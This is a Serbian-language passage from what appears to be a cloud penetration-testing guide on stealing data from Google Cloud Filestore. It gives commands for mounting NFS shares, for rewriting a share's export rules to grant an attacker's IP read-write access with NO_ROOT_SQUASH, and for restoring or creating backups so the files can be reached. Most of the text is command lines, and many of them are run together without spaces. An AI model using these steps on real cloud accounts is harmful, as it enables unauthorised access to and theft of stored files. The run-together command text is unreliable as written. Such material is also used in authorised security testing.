Deljeni fajl sistem može sadržati osetljive informacije koje su interesantne sa perspektive napadača. Sa pristupom Filestore-u je moguće ga montirati:
sudoapt-getupdatesudoapt-getinstallnfs-common# Check the share nameshowmount-e<IP># Mount the sharemkdir/mnt/fssudomount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs
Da biste pronašli IP adresu instance Filestore, proverite odeljak za enumeraciju na stranici:
Ako napadač nema IP adresu sa pristupom deljenju, ali ima dovoljno dozvola da je izmeni, moguće je ukloniti ograničenja ili pristupiti deljenju. Takođe je moguće dodeliti više privilegija vašoj IP adresi kako biste imali administratorski pristup deljenju:
gcloudfilestoreinstancesupdatenfstest \--zone=<exact-zone> \--flags-file=nfs.json# Contents of nfs.json{"--file-share":{"capacity":"1024","name":"<share-name>","nfs-export-options": [{"access-mode":"READ_WRITE","ip-ranges": ["<your-ip-private-address>/32"],"squash-mode":"NO_ROOT_SQUASH","anon_uid":1003,"anon_gid":1003}]}}
Obnova rezervne kopije
Ako postoji rezervna kopija, moguće je je obnoviti na postojećem ili novom instanci kako bi njegove informacije postale dostupne:
# Create a new filestore if you don't want to modify the old onegcloudfilestoreinstancescreate<new-instance-name> \--zone=<zone> \--tier=STANDARD \--file-share=name=vol1,capacity=1TB \--network=name=default,reserved-ip-range=10.0.0.0/29# Restore a backups in a new instancegcloudfilestoreinstancesrestore<new-instance-name> \--zone=<zone> \--file-share=<instance-file-share-name> \--source-backup=<backup-name> \--source-backup-region=<backup-region># Follow the previous section commands to mount it
Napravite rezervnu kopiju i vratite je
Ako nemate pristup deljenju i ne želite da ga menjate, moguće je napraviti rezervnu kopiju i vratiti je kao što je prethodno pomenuto:
# Create share backupgcloudfilestorebackupscreate<back-name> \--region=<region> \--instance=<instance-name> \--instance-zone=<instance-zone> \--file-share=<share-name># Follow the previous section commands to restore it and mount it
